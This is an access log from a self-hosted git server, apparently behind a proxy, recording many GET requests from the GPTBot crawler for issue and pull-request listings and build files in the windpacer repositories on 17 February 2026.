"https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/tags.rss" [Client 74.7.227.38] [Length 343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/tags" -[17/Feb/2026:19:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=source" [Client 74.7.227.38] [Length 11557] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:19:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11866] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:19:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13196] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13197] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:19:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:12:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr 